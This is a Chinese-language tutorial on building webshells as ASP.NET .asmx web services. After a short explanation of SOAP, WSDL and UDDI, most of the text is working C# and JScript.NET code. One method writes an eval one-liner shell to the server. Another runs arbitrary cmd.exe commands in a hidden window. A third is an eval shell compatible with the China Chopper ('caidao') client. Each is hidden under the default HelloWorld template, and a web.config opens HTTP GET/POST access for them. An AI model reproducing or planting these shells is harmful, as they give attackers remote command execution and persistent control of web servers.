Web Service是一个基于可编程的web的应用程序,用于开发分布式的互操作的应用程序,也是一种web服务,Web Service的主要目标是跨平台的可互操作性,为了实现这一目标Web Service 完全基于XML(可扩展标记语言)、XSD(XML Schema)等独立于平台、独立于软件供应商的标准,是创建可互操作的、分布式应用程序的新平台。简单的来说Web Service具备三个要素SOAP(Simple Object Access Protocol)、WSDL(WebServicesDescriptionLanguage)、UDDI(UniversalDescriptionDiscovery andIntegration)之一, SOAP用来描述传递信息的格式, WSDL 用来描述如何访问具体的接口, UDDI用来管理,分发查询webService ,也因此使用Web Service有许多优点,例如可以跨平台工作、部署升级维护起来简单方便、实现多数据多个服务的聚合使用等等。再结合下图说明一下WebService工作的流程
在Web Service程序中,如果一个公共方法想被外界访问调用的话,就需要加上WebMethod
这是一个默认的web server
那么我们如果再hellword里面构造我们的危险方法
tip一 创建文件
<%@ WebService Language="C#" Class="WebService1" %> using System.IO; using System.Collections; using System.ComponentModel; using System.Data; using System.Diagnostics; using System.Web; using System.Web.Services; [WebService(Namespace = "http://tempuri.org/")] [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] // To allow this Web Service to be called from script, using ASP.NET AJAX, uncomment the following line. // [System.Web.Script.Services.ScriptService] public class WebService1 : System.Web.Services.WebService { public WebService1() { // // TODO: Add any constructor code required // } // WEB SERVICE EXAMPLE // The HelloWorld() example service returns the string Hello World. [WebMethod] public string HelloWorld(string input) { StreamWriter helloshell = File.CreateText(HttpContext.Current.Server.MapPath(input)); helloshell.Write("<%@ WebService Language="Jscript"%><%eval(Request.Item["a"]);%>"); helloshell.Flush(); helloshell.Close(); return "helloshell"; } }
tips2--cmd执行命令小马(c#版)
<%@ WebService Language="C#" Class="WebService1" %>
using System.IO;
using System.Collections;
using System.ComponentModel;
using System.Data;
using System.Diagnostics;
using System.Web;
using System.Web.Services;
[WebService(Namespace = "http://tempuri.org/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
// To allow this Web Service to be called from script, using ASP.NET AJAX, uncomment the following line.
// [System.Web.Script.Services.ScriptService]
public class WebService1 : System.Web.Services.WebService
{
public WebService1()
{
//
// TODO: Add any constructor code required
//
}
// WEB SERVICE EXAMPLE
// The HelloWorld() example service returns the string Hello World.
[WebMethod]
public string HelloWorld(string input)
{
Process oci = new Process();
oci.StartInfo.FileName = "cmd.exe";
oci.StartInfo.RedirectStandardOutput = true;
oci.StartInfo.UseShellExecute = false;//从定向IO流
oci.StartInfo.Arguments = "/c" + input;
oci.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
oci.Start();
StreamReader txt = oci.StandardOutput;
string alltxt = txt.ReadToEnd();
txt.Close();
txt.Dispose();//释放资源
return alltxt;
}
}
tip3--打造菜刀可连接一句话
这里注意菜刀是get postvalue传参 并不是sopa协议调用http所以如果需要构造菜刀asmx一句话则web.config设置
<?xml version="1.0" encoding="utf-8"?>
<!--
有关如何配置 ASP.NET 应用程序的详细信息,请访问
https://go.microsoft.com/fwlink/?LinkId=169433
-->
<configuration>
<system.web>
<webServices>
<protocols>
<add name="HttpPost"/>
<add name="HttpGet"/>
</protocols>
</webServices>
<compilation debug="true" targetFramework="4.0" />
<customErrors mode="Off"/>
</system.web>
</configuration>
接下来构造菜刀jscript.net一句话
<%@ WebService Language="JScript" Class="WebService1" %>
import System;import System.Web;import System.IO;import System.Web.Services;
import System.Web.Script.Services;
import System.Web;
import System.Web.Services;
public class WebService1 extends WebService
{
WebMethodAttribute ScriptMethodAttribute function Cmdshell(Pass : String) : Void
{
var c = HttpContext.Current;
var Request = c.Request;
var Response = c.Response;
eval(Pass);
}
}
